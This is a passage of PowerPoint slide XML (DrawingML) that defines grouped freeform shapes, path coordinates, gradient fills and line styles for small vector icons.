                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="319" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="319" y="8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15" name="Group 314"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4030029" y="1746843"/>
              <a:ext cx="1447867" cy="577457"/>
              <a:chOff x="2205941" y="3624925"/>
              <a:chExt cx="1631950" cy="650875"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="316" name="Freeform 1310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2205941" y="3836062"/>
                <a:ext cx="1631950" cy="439738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noFill/>
              <a:ln w="38100" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="2A79D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ACACA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17" name="Line 535"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2418666" y="3748750"/>
                <a:ext cx="0" cy="250825"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="2A79D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318" name="Group 536"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2482166" y="3686837"/>
                <a:ext cx="236537" cy="201613"/>
                <a:chOff x="4876" y="-3681"/>
                <a:chExt cx="865" cy="735"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="337" name="Freeform 537"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5536" y="-3537"/>
                  <a:ext cx="205" cy="506"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 43 w 87"/>
                    <a:gd name="T1" fmla="*/ 9 h 214"/>
                    <a:gd name="T2" fmla="*/ 14 w 87"/>
                    <a:gd name="T3" fmla="*/ 190 h 214"/>
                    <a:gd name="T4" fmla="*/ 69 w 87"/>
                    <a:gd name="T5" fmla="*/ 197 h 214"/>
                    <a:gd name="T6" fmla="*/ 75 w 87"/>
                    <a:gd name="T7" fmla="*/ 4 h 214"/>
                    <a:gd name="T8" fmla="*/ 43 w 87"/>
                    <a:gd name="T9" fmla="*/ 9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7" h="214">
                      <a:moveTo>
                        <a:pt x="43" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="17"/>
                        <a:pt x="0" y="171"/>
                        <a:pt x="14" y="190"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="209"/>
                        <a:pt x="49" y="214"/>
                        <a:pt x="69" y="197"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="182"/>
                        <a:pt x="87" y="16"/>
                        <a:pt x="75" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="4"/>
                        <a:pt x="58" y="0"/>
                        <a:pt x="43" y="9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38" name="Freeform 538"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5054" y="-3681"/>
                  <a:ext cx="630" cy="654"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 267"/>
                    <a:gd name="T1" fmla="*/ 8 h 277"/>
                    <a:gd name="T2" fmla="*/ 14 w 267"/>
                    <a:gd name="T3" fmla="*/ 206 h 277"/>
                    <a:gd name="T4" fmla="*/ 247 w 267"/>
                    <a:gd name="T5" fmla="*/ 268 h 277"/>
                    <a:gd name="T6" fmla="*/ 247 w 267"/>
                    <a:gd name="T7" fmla="*/ 70 h 277"/>
                    <a:gd name="T8" fmla="*/ 14 w 267"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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67" h="277">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="225"/>
                        <a:pt x="234" y="277"/>
                        <a:pt x="247" y="268"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="259" y="260"/>
                        <a:pt x="267" y="108"/>
                        <a:pt x="247" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="56"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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Freeform 539"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5117" y="-3620"/>
                  <a:ext cx="489" cy="527"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 489"/>
                    <a:gd name="T1" fmla="*/ 0 h 527"/>
                    <a:gd name="T2" fmla="*/ 0 w 489"/>
                    <a:gd name="T3" fmla="*/ 397 h 527"/>
                    <a:gd name="T4" fmla="*/ 489 w 489"/>
                    <a:gd name="T5" fmla="*/ 527 h 527"/>
                    <a:gd name="T6" fmla="*/ 489 w 489"/>
                    <a:gd name="T7" fmla="*/ 130 h 527"/>
                    <a:gd name="T8" fmla="*/ 0 w 489"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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9" h="527">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="527"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="13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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="78824"/>
                        <a:invGamma/>
                      </a:srgbClr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0" name="Freeform 540"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5087" y="-3681"/>
                  <a:ext cx="640" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 100 w 271"/>
                    <a:gd name="T1" fmla="*/ 14 h 73"/>
                    <a:gd name="T2" fmla="*/ 41 w 271"/>
                    <a:gd name="T3" fmla="*/ 4 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 271"/>
                    <a:gd name="T5" fmla="*/ 8 h 73"/>
                    <a:gd name="T6" fmla="*/ 233 w 271"/>
                    <a:gd name="T7" fmla="*/ 70 h 73"/>
                    <a:gd name="T8" fmla="*/ 265 w 271"/>
                    <a:gd name="T9" fmla="*/ 65 h 73"/>
                    <a:gd name="T10" fmla="*/ 100 w 271"/>
                    <a:gd name="T11" fmla="*/ 14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1" h="73">
                      <a:moveTo>
                        <a:pt x="100" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="77" y="9"/>
                        <a:pt x="48" y="4"/>
                        <a:pt x="41" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="4"/>
                        <a:pt x="7" y="2"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="222" y="60"/>
                        <a:pt x="233" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="237" y="73"/>
                        <a:pt x="271" y="69"/>
                        <a:pt x="265" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="257" y="59"/>
                        <a:pt x="161" y="29"/>
                        <a:pt x="100" y="1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Freeform 541"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3154"/>
                  <a:ext cx="660" cy="175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 660"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 660"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 660 w 660"/>
                    <a:gd name="T5" fmla="*/ 120 h 175"/>
                    <a:gd name="T6" fmla="*/ 452 w 660"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 660"/>
                    <a:gd name="T9" fmla="*/ 52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0" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="660" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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Freeform 542"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="5328" y="-3034"/>
                  <a:ext cx="198" cy="88"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 198"/>
                    <a:gd name="T1" fmla="*/ 55 h 88"/>
                    <a:gd name="T2" fmla="*/ 0 w 198"/>
                    <a:gd name="T3" fmla="*/ 88 h 88"/>
                    <a:gd name="T4" fmla="*/ 198 w 198"/>
                    <a:gd name="T5" fmla="*/ 36 h 88"/>
                    <a:gd name="T6" fmla="*/ 198 w 198"/>
                    <a:gd name="T7" fmla="*/ 0 h 88"/>
                    <a:gd name="T8" fmla="*/ 0 w 198"/>
                    <a:gd name="T9" fmla="*/ 55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8" h="88">
                      <a:moveTo>
                        <a:pt x="0" y="55"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="88"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="198" y="0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543"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4876" y="-3102"/>
                  <a:ext cx="452" cy="156"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 452 w 452"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 452"/>
                    <a:gd name="T3" fmla="*/ 35 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 452"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 452 w 452"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 452 w 452"/>
                    <a:gd name="T9" fmla="*/ 156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2" h="156">
                      <a:moveTo>
                        <a:pt x="452" y="156"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="15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4" name="Freeform 544"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4938" y="-3140"/>
                  <a:ext cx="517" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 38 h 139"/>
                    <a:gd name="T2" fmla="*/ 383 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 104 h 139"/>
                    <a:gd name="T6" fmla="*/ 135 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 38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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="383" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="135" y="0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19" name="Group 545"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2309128" y="3707475"/>
                <a:ext cx="227012" cy="217488"/>
                <a:chOff x="535" y="1771"/>
                <a:chExt cx="401" cy="385"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="333" name="Freeform 546"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="667" y="1808"/>
                  <a:ext cx="269" cy="348"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 454"/>
                    <a:gd name="T1" fmla="*/ 120 h 588"/>
                    <a:gd name="T2" fmla="*/ 0 w 454"/>
                    <a:gd name="T3" fmla="*/ 588 h 588"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 468 h 588"/>
                    <a:gd name="T6" fmla="*/ 454 w 454"/>
                    <a:gd name="T7" fmla="*/ 0 h 588"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 120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588">
                      <a:moveTo>
                        <a:pt x="0" y="120"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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34" name="Freeform 547"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="535" y="1843"/>
                  <a:ext cx="132" cy="313"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 224"/>
                    <a:gd name="T1" fmla="*/ 0 h 529"/>
                    <a:gd name="T2" fmla="*/ 0 w 224"/>
                    <a:gd name="T3" fmla="*/ 470 h 529"/>
                    <a:gd name="T4" fmla="*/ 224 w 224"/>
                    <a:gd name="T5" fmla="*/ 529 h 529"/>
                    <a:gd name="T6" fmla="*/ 224 w 224"/>
                    <a:gd name="T7" fmla="*/ 61 h 529"/>
                    <a:gd name="T8" fmla="*/ 0 w 224"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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4" h="529">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="224" y="529"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="224" y="6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Freeform 548"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="535" y="1771"/>
                  <a:ext cx="401" cy="108"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 678"/>
                    <a:gd name="T1" fmla="*/ 121 h 182"/>
                    <a:gd name="T2" fmla="*/ 451 w 678"/>
                    <a:gd name="T3" fmla="*/ 0 h 182"/>
                    <a:gd name="T4" fmla="*/ 678 w 678"/>
                    <a:gd name="T5" fmla="*/ 62 h 182"/>
                    <a:gd name="T6" fmla="*/ 224 w 678"/>
                    <a:gd name="T7" fmla="*/ 182 h 182"/>
                    <a:gd name="T8" fmla="*/ 0 w 678"/>
                    <a:gd name="T9" fmla="*/ 121 h 1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8" h="182">
                      <a:moveTo>
                        <a:pt x="0" y="121"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="451" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="678" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="224" y="182"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="12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Freeform 549"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="552" y="1875"/>
                  <a:ext cx="93" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 156"/>
                    <a:gd name="T1" fmla="*/ 0 h 88"/>
                    <a:gd name="T2" fmla="*/ 0 w 156"/>
                    <a:gd name="T3" fmla="*/ 48 h 88"/>
                    <a:gd name="T4" fmla="*/ 156 w 156"/>
                    <a:gd name="T5" fmla="*/ 88 h 88"/>
                    <a:gd name="T6" fmla="*/ 156 w 156"/>
                    <a:gd name="T7" fmla="*/ 43 h 88"/>
                    <a:gd name="T8" fmla="*/ 0 w 156"/>
                    <a:gd name="T9" fmla="*/ 0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6" h="88">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="156" y="88"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="156" y="4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20" name="Group 619"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2804428" y="3624925"/>
                <a:ext cx="265112" cy="273050"/>
                <a:chOff x="62" y="-4113"/>
                <a:chExt cx="980" cy="1008"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="327" name="Freeform 620"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="126" y="-3816"/>
                  <a:ext cx="916" cy="711"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 388"/>
                    <a:gd name="T1" fmla="*/ 0 h 301"/>
                    <a:gd name="T2" fmla="*/ 196 w 388"/>
                    <a:gd name="T3" fmla="*/ 0 h 301"/>
                    <a:gd name="T4" fmla="*/ 20 w 388"/>
                    <a:gd name="T5" fmla="*/ 108 h 301"/>
                    <a:gd name="T6" fmla="*/ 5 w 388"/>
                    <a:gd name="T7" fmla="*/ 250 h 301"/>
                    <a:gd name="T8" fmla="*/ 196 w 388"/>
                    <a:gd name="T9" fmla="*/ 301 h 301"/>
                    <a:gd name="T10" fmla="*/ 388 w 388"/>
                    <a:gd name="T11" fmla="*/ 51 h 301"/>
                    <a:gd name="T12" fmla="*/ 196 w 388"/>
                    <a:gd name="T13" fmla="*/ 0 h 3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88" h="301">
                      <a:moveTo>
                        <a:pt x="196" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="0"/>
                        <a:pt x="196" y="0"/>
                        <a:pt x="196" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="0"/>
                        <a:pt x="47" y="29"/>
                        <a:pt x="20" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="168"/>
                        <a:pt x="5" y="250"/>
                        <a:pt x="5" y="250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="301"/>
                        <a:pt x="196" y="301"/>
                        <a:pt x="196" y="301"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="388" y="51"/>
                        <a:pt x="388" y="51"/>
                        <a:pt x="388" y="51"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="19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Freeform 621"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="473" y="-3799"/>
                  <a:ext cx="501" cy="137"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 501"/>
                    <a:gd name="T1" fmla="*/ 28 h 137"/>
                    <a:gd name="T2" fmla="*/ 106 w 501"/>
                    <a:gd name="T3" fmla="*/ 0 h 137"/>
                    <a:gd name="T4" fmla="*/ 501 w 501"/>
                    <a:gd name="T5" fmla="*/ 106 h 137"/>
                    <a:gd name="T6" fmla="*/ 397 w 501"/>
                    <a:gd name="T7" fmla="*/ 137 h 137"/>
                    <a:gd name="T8" fmla="*/ 0 w 501"/>
                    <a:gd name="T9" fmla="*/ 28 h 1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01" h="137">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="106" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="501" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="397" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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622"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="62" y="-3256"/>
                  <a:ext cx="503" cy="137"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 503"/>
                    <a:gd name="T1" fmla="*/ 29 h 137"/>
                    <a:gd name="T2" fmla="*/ 106 w 503"/>
                    <a:gd name="T3" fmla="*/ 0 h 137"/>
                    <a:gd name="T4" fmla="*/ 503 w 503"/>
                    <a:gd name="T5" fmla="*/ 106 h 137"/>
                    <a:gd name="T6" fmla="*/ 397 w 503"/>
                    <a:gd name="T7" fmla="*/ 137 h 137"/>
                    <a:gd name="T8" fmla="*/ 0 w 503"/>
                    <a:gd name="T9" fmla="*/ 29 h 1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03" h="137">
                      <a:moveTo>
                        <a:pt x="0" y="29"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="106" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="503" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="397" y="137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Freeform 623"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="168" y="-3310"/>
                  <a:ext cx="397" cy="160"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 397"/>
                    <a:gd name="T1" fmla="*/ 54 h 160"/>
                    <a:gd name="T2" fmla="*/ 0 w 397"/>
                    <a:gd name="T3" fmla="*/ 0 h 160"/>
                    <a:gd name="T4" fmla="*/ 397 w 397"/>
                    <a:gd name="T5" fmla="*/ 109 h 160"/>
                    <a:gd name="T6" fmla="*/ 397 w 397"/>
                    <a:gd name="T7" fmla="*/ 160 h 160"/>
                    <a:gd name="T8" fmla="*/ 0 w 397"/>
                    <a:gd name="T9" fmla="*/ 54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7" h="160">
                      <a:moveTo>
                        <a:pt x="0" y="54"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="397" y="109"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="397" y="160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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31" name="Freeform 624"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="530" y="-4113"/>
                  <a:ext cx="468" cy="451"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 468"/>
                    <a:gd name="T1" fmla="*/ 356 h 451"/>
                    <a:gd name="T2" fmla="*/ 132 w 468"/>
                    <a:gd name="T3" fmla="*/ 0 h 451"/>
                    <a:gd name="T4" fmla="*/ 468 w 468"/>
                    <a:gd name="T5" fmla="*/ 92 h 451"/>
                    <a:gd name="T6" fmla="*/ 338 w 468"/>
                    <a:gd name="T7" fmla="*/ 451 h 451"/>
                    <a:gd name="T8" fmla="*/ 0 w 468"/>
                    <a:gd name="T9" fmla="*/ 356 h 4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8" h="451">
                      <a:moveTo>
                        <a:pt x="0" y="356"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="132" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="468" y="92"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="338" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="35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32" name="Freeform 625"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="577" y="-3695"/>
                  <a:ext cx="465" cy="590"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 5 w 197"/>
                    <a:gd name="T1" fmla="*/ 250 h 250"/>
                    <a:gd name="T2" fmla="*/ 20 w 197"/>
                    <a:gd name="T3" fmla="*/ 109 h 250"/>
                    <a:gd name="T4" fmla="*/ 197 w 197"/>
                    <a:gd name="T5" fmla="*/ 0 h 250"/>
                    <a:gd name="T6" fmla="*/ 197 w 197"/>
                    <a:gd name="T7" fmla="*/ 199 h 250"/>
                    <a:gd name="T8" fmla="*/ 5 w 197"/>
                    <a:gd name="T9" fmla="*/ 250 h 2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7" h="250">
                      <a:moveTo>
                        <a:pt x="5" y="250"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="250"/>
                        <a:pt x="0" y="168"/>
                        <a:pt x="20" y="109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="29"/>
                        <a:pt x="197" y="0"/>
                        <a:pt x="197" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="197" y="199"/>
                        <a:pt x="197" y="199"/>
                        <a:pt x="197" y="199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5" y="25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21" name="Group 595"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2567891" y="3642387"/>
                <a:ext cx="246062" cy="382588"/>
                <a:chOff x="2363" y="1132"/>
                <a:chExt cx="343" cy="529"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="322" name="Freeform 596"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2474" y="1449"/>
                  <a:ext cx="145" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
